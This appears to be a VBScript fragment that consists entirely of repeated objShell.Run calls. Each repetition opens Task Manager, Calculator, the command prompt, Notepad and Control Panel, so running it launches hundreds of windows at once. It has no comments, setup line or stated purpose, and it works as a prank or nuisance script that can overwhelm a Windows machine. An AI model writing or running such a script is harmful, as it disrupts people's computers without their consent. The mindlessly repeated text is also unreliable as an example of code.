objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
